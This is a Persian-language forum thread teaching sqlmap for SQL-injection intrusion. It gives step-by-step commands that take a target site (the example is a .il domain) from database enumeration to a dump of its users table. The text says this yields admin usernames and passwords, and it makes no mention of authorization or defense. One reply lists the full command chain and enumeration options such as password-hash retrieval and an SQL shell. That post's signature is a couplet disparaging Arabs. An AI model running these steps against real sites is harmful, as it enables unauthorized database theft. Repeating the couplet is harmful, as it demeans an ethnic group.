SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

...::: Sqlmap tutorial :::....

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    ...::: Sqlmap tutorial :::....

    به نام خدا

    با سلام خدمت دوستان!

    همون طور که میدونید انجمن به چند روز قبل برگشته و این تاپیک به طور کامل پاک شده!

    ولی هیچ مشکلی نیست و از اول اموزش رو براتون قرار میدم این جوری بهتر شد تا هر چی نکته که قبلن نگفتم رو اینجا قرار میدم!


    تعرفی از Sqlmap :

    این ابزار در دو سیستم عامل Win & Linux قابل راه اندازی و استفاده هست. برای نفوذ به دیتابیس ها از طریق باگ Sql injection مورد استفاده قرار میگیره!

    اگه شما هم از سیستم عامل محبوب Back Track استفاده مکینید نیازی به دانلود و نصب نیست.چون خودکار نصبه.

    برای نصب روی ویندوز میتونید از لینک های زیر استفاده کنید:

    از sourceforge:

    [php]
    http://sourceforge.net/projects/sqlmap/
    [/php]

    از سایت اصلی:
    [php]
    http://sqlmap.org/
    [/php]

    این ابزار رو میتونید در بک ترک از مسیر زیر باز کنید:

    [align=center][/align]

    پس از باز شدن برنامه:

    [align=center][/align]


    در این بحث اموزشی ما قسمت Enumeration میپردازیم و سیوچ های این بخش رو اموزش میدیم!

    ادامه دارد....
    [align=center]وما توفيقي الا بالله
    برچسب ها: هیچ یک
  • #2
    RE: ...::: Sqlmap tutorial :::....

    با سلام

    در این جلسه اموزشی، اموزش پیدا کردن دیتابیس توسط Sqlmap رو اموزش خواهم داد.

    طبق پست بالا برنامه رو اجرا کنید.

    تارگت خودتون رو از قبل اماده کنید!

    تعریف سویچ ها :

    سویچ u- : معرفی تارگت به برنامه

    سویچ dbs-- : تقاضای Database تارگت از برنامه

    دستور به صورت زیر میباشد:
    [php]
    python sqlmap.py -u target --dbs
    [/php]

    [php]
    ./sqlmap.py -u target --dbs
    [/php]

    به صورت زیر:

    [php]
    python sqlmap.py -u http://www.Site.org/index.php?id=123 --dbs
    [/php]

    [php]
    ./sqlmap.py -u http://www.Site.org/index.php?id=123 --dbs
    [/php]

    و در اخر دیتابیس های پیدا شده در اخرین سطر ها تایپ میشوند:

    [align=center][/align]

    فیلم اموزشی :
    [php]
    http://amirio.persiangig.com/video/backtrack/find_database_sqlmap.rar
    [/php]



    در جلسه بعد اموزش پیدا کردن Table ها اموزش داده خواهد شد.

    من الله توفیق
    [align=center]وما توفيقي الا بالله

    نظر

    • #3
      RE: ...::: Sqlmap tutorial :::....

      با سلام

      در این درس اموزش پیدا کردن Tables ها اشنا خواهید شد.

      [php]
      http://amirio.persiangig.com/video/backtrack/find_tables_sqlmap.rar
      [/php]
      [align=center]وما توفيقي الا بالله

      نظر

      • #4
        RE: ...::: Sqlmap tutorial :::....

        با سلام

        در این فیلم با اموزش پیدا کردن columns اشنا خواهید شد.

        [php]
        http://amirio.persiangig.com/video/backtrack/find_columns_sqlmap.rar
        [/php]
        [align=center]وما توفيقي الا بالله

        نظر

        • #5
          RE: ...::: Sqlmap tutorial :::....

          با سلام

          قسمت اخر اموزش

          در این اموزش با dump کردن columns اشنا میشید!

          در این مرحله اطلاعاتی مثل User & passwd ادمین بیرون کشیده میشه!

          امیدوارم لذت ببرید:
          [php]
          http://amirio.persiangig.com/video/backtrack/dump_columns_sqlmap.rar
          [/php]
          [align=center]وما توفيقي الا بالله

          نظر

          • #6
            RE: ...::: Sqlmap tutorial :::....

            با تشکر از مطالب مفید

            مراحل اینجکت به وسیله SQL MAP

            کد:
            python sqlmap.py -u 'http://site.il/page.php?id=5'



python sqlmap.py -u "http://site.il/page.php?id=5" --dbs



python sqlmap.py -u "http://site.il/page.php?id=5" --tables -D db_name



python sqlmap.py -u "http://site.il/page.php?id=5" --columns -D db_name -T users



python sqlmap.py -u "http://site.il/page.php?id=5" --dump -D db_name -T users
            آپشن های SQL MAP

            کد:
               -b, --banner        Retrieve DBMS banner
   --current-user      Retrieve DBMS current user
   --current-db        Retrieve DBMS current database
   --is-dba            Detect if the DBMS current user is DBA
   --users             Enumerate DBMS users
   --passwords         Enumerate DBMS users password hashes
   --privileges        Enumerate DBMS users privileges
   --roles             Enumerate DBMS users roles
   --dbs               Enumerate DBMS databases
   --tables            Enumerate DBMS database tables
   --columns           Enumerate DBMS database table columns
   --dump              Dump DBMS database table entries
   --dump-all          Dump all DBMS databases tables entries
   --search            Search column(s), table(s) and/or database name(s)
   -D DB               DBMS database to enumerate
   -T TBL              DBMS database table to enumerate
   -C COL              DBMS database table column to enumerate
   -U USER             DBMS user to enumerate
   --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
   --start=LIMITSTART  First query output entry to retrieve
   --stop=LIMITSTOP    Last query output entry to retrieve
   --first=FIRSTCHAR   First query output word character to retrieve
   --last=LASTCHAR     Last query output word character to retrieve
   --sql-query=QUERY   SQL statement to be executed
   --sql-shell         Prompt for an interactive SQL shell
            [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

            که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو            [/align]

            نظر

            قبلی template بعدی
            صبر کنید ..
            X